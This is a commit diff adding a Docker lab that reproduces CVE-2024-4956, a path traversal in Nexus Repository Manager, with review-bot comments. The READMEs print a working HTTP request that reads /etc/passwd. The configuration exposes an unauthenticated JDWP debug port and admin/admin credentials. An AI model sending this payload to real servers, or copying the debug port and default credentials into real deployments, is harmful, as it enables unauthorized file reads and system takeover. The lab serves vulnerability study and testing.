Showing 7 changed files with 107 additions and 0 deletions.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
FROM sonatype/nexus3:3.68.0 | ||
|
||
LABEL maintainer="phithon <[email protected]>" | ||
|
||
USER root | ||
|
||
RUN set -ex \ | ||
&& sed -i 's/storage\.diskCache\.diskFreeSpaceLimit=4096/storage.diskCache.diskFreeSpaceLimit=512/' /opt/sonatype/nexus/etc/karaf/system.properties \ | ||
&& echo "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005" >> /opt/sonatype/nexus/bin/nexus.vmoptions |
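Review bot: the `USER root` switch in this Dockerfile is never reverted, so Nexus itself runs as root instead of the base image's unprivileged `nexus` user; root is only needed for the `sed` on `system.properties` and the append to `nexus.vmoptions`, so add `USER nexus` after the `RUN` step. The appended `-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005` line also opens an unauthenticated debugger that gives code execution inside the JVM to anyone who can reach it; note that on JDK 9+ a bare `address=5005` binds to localhost only (it would need `*:5005` to be reachable through the published port), so either make this line conditional on a build argument or document in the READMEs that 5005 must never be exposed beyond the lab host.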
@@ -0,0 +1,46 @@ | ||
# Nexus Repository Manager 3 Unauthenticated Path Traversal (CVE-2024-4956) | ||
|
||
[中文版本(Chinese version)](README.zh-cn.md) | ||
|
||
Nexus Repository Manager is a repository manager that organizes, stores and distributes artifacts needed for development. | ||
|
||
A path traversal vulnerability has been discovered in Nexus Repository 3 before version 3.68.1, the vulnerability allows for an attacker to craft a URL to return any file as a download, including system files outside of Nexus Repository application scope, without any authentication. | ||
|
||
References: | ||
|
||
- <https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16> | ||
|
||
## Vulnerable environment | ||
|
||
Execute following command to start a Nexus Repository Manager version 3.68.0: | ||
|
||
``` | ||
docker compose up -d | ||
``` | ||
|
||
After the server is started, browse `http://your-ip:8081` to see the home page of Nexus. | ||
|
||
## Exploit | ||
|
||
Just like SpringMVC CVE-2018-1271 from Orange Tsai's [share](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf), Jetty's `URIUtil.canonicalPath()` also treats the empty string as a directory whih is the root case of this vulnerability: | ||
|
||
![](1.png) | ||
|
||
Simply send following request to reproduce the issue: | ||
|
||
``` | ||
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 | ||
Host: localhost:8081 | ||
Accept-Encoding: gzip, deflate, br | ||
Accept: */* | ||
Accept-Language: en-US;q=0.9,en;q=0.8 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 | ||
Connection: close | ||
Cache-Control: max-age=0 | ||
``` | ||
|
||
As you can see, `/etc/passwd` has been exposed directly: | ||
|
||
![](2.png) |
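Review bot: two typos in the Exploit section: `whih` should be `which` and `root case` should be `root cause`. The README also says nothing about what the rest of this commit configures: docker-compose.yml publishes a JDWP debug port on 5005 and mounts `admin.password` containing `admin`, so the lab starts with a known admin credential and an unauthenticated code-execution port. Add a line under "Vulnerable environment" stating both, so users keep the environment off reachable interfaces.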
@@ -0,0 +1,42 @@ | ||
# Nexus Repository Manager 3 未授权目录穿越漏洞(CVE-2024-4956) | ||
|
||
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。 | ||
|
||
其3.68.0及之前版本中,存在一处目录穿越漏洞。攻击者可以利用该漏洞读取服务器上任意文件。 | ||
|
||
参考链接: | ||
|
||
- <https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16> | ||
|
||
## 漏洞环境 | ||
|
||
执行如下命令启动一个Nexus Repository Manager version 3.68.0 版本服务器: | ||
|
||
``` | ||
docker compose up -d | ||
``` | ||
|
||
环境启动后,访问`http://your-ip:8081`即可看到Nexus的默认页面。 | ||
|
||
## 漏洞复现 | ||
|
||
与Orange Tsai在[Blackhat US 2018](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf)分享的SpringMVC CVE-2018-1271漏洞类似,Jetty的`URIUtil.canonicalPath()`函数也将空字符串认为是一个合法目录,导致了该漏洞的产生: | ||
|
||
发送如下请求来复现漏洞: | ||
|
||
``` | ||
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 | ||
Host: localhost:8081 | ||
Accept-Encoding: gzip, deflate, br | ||
Accept: */* | ||
Accept-Language: en-US;q=0.9,en;q=0.8 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 | ||
Connection: close | ||
Cache-Control: max-age=0 | ||
``` | ||
|
||
可见,`/etc/passwd`已被成功读取: | ||
|
||
![](1.png) |
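Review bot: the closing screenshot reference `![](1.png)` looks wrong: in README.md `1.png` is the Jetty `canonicalPath()` screenshot and `2.png` is the `/etc/passwd` response, and this file shows only the response, so it should point at `2.png`. This file is also missing the reciprocal language link (`[English version](README.md)`) that README.md provides to `README.zh-cn.md`.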
@@ -0,0 +1 @@ | ||
admin |
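Review bot: this file is bind-mounted by docker-compose.yml to `/nexus-data/admin.password`, which fixes the initial admin credential of a service published on port 8081 to `admin`/`admin`; acceptable for a throwaway lab, but neither README mentions it, and a user who leaves the container running on a shared network now has a default-credential Nexus in addition to the path traversal. State the credential in both READMEs.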
@@ -0,0 +1,9 @@ | ||
version: '3' | ||
services: | ||
web: | ||
image: vulhub/nexus:3.68.0 | ||
ports: | ||
- "8081:8081" | ||
- "5005:5005" | ||
volumes: | ||
- ./admin.password:/nexus-data/admin.password |
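Review bot: `- "5005:5005"` publishes the JDWP port on every host interface; bind it to loopback (`- "127.0.0.1:5005:5005"`) or drop it, since anyone able to reach that port gets arbitrary code execution in the Nexus JVM, a far worse exposure than the file read this lab is meant to demonstrate. Minor: `version: '3'` is ignored with a warning by current Compose releases and can be removed.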